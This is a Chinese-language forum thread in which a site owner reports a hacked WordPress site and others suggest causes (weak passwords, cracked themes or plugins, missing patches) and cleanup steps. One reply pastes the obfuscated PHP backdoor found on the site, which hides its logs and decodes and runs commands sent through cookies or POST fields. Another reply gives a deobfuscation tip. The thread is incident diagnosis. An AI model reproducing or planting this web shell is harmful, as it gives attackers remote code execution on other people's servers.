有大佬在吗？wordpress也被黑了

HaoLan

第一有没有使用弱密码。第二有没有及时更新wordpress。一般wordpress都是爆破上马了。wordpress真的很安全。几乎几年来都不会遇到一个可以上传马的漏洞

黑大王

一般是破解的插件主题有后门

胖虎

wordpress现在安全补丁都是自动升级，估计是用了不干净的主题或插件了

30826

弱密码的问题吧，你不限制登录每秒能被人爆破几千次

z13579

这个php文件的内容是一个php的后门，可以修改一下东西什么的，如果只有wp的程序，那么可能是wp的补丁没补，其实想知道他怎么弄进来也简单,把他的木马删除，然后设置网站容器记录网站post的日志，或者就直接看网站的日志，应该会有异常的

SweetHunter

还是要解密，不清楚是不是木马，还是作者本人的加密

@ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @set_time_limit(0); $approvals = False; foreach ($_COOKIE as $cookie_one=>$cookie_two) { $approvals = $cookie_two; $manager_invitation = $cookie_one; $approvals = remove_letter(_base64_decode($approvals), $manager_invitation); if ($approvals) { break; } } function improve_meta() { return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH"); } function append_strings($append, $string) { return $append ^ $string; } if (!$approvals) { foreach ($_POST as $contribute=>$research) { $approvals = $research; $manager_invitation = $contribute; $approvals = remove_letter(_base64_decode($approvals), $manager_invitation); if ($approvals) { break; } } } function make_submission($people, $collaborate) { $confirm_invite = ""; for ($i=0; $i 0) { $c = ($b & 0xFF0000) >> 16; $buffer .=chr($c); $b <<= 8; $num--; } $i += 4; } return $buffer; } ?>

周润发

主题的问题最大 仔细看看是不是有洞

flash

把你站备份，将所有插件和文件检查一遍，看看是哪个插件或主题的问题。你这个是 eval，不好判断，这只是已经中了之后的脚本，你得找出原因，这样才能解决。新版本wp很难直接挂或切入，另外还得检查ftp或系统是否被拿了webshell，看下日志吧。

lunone

把最后的那个eval改成echo就是加密前的代码

主机参考

破解主题里面有问题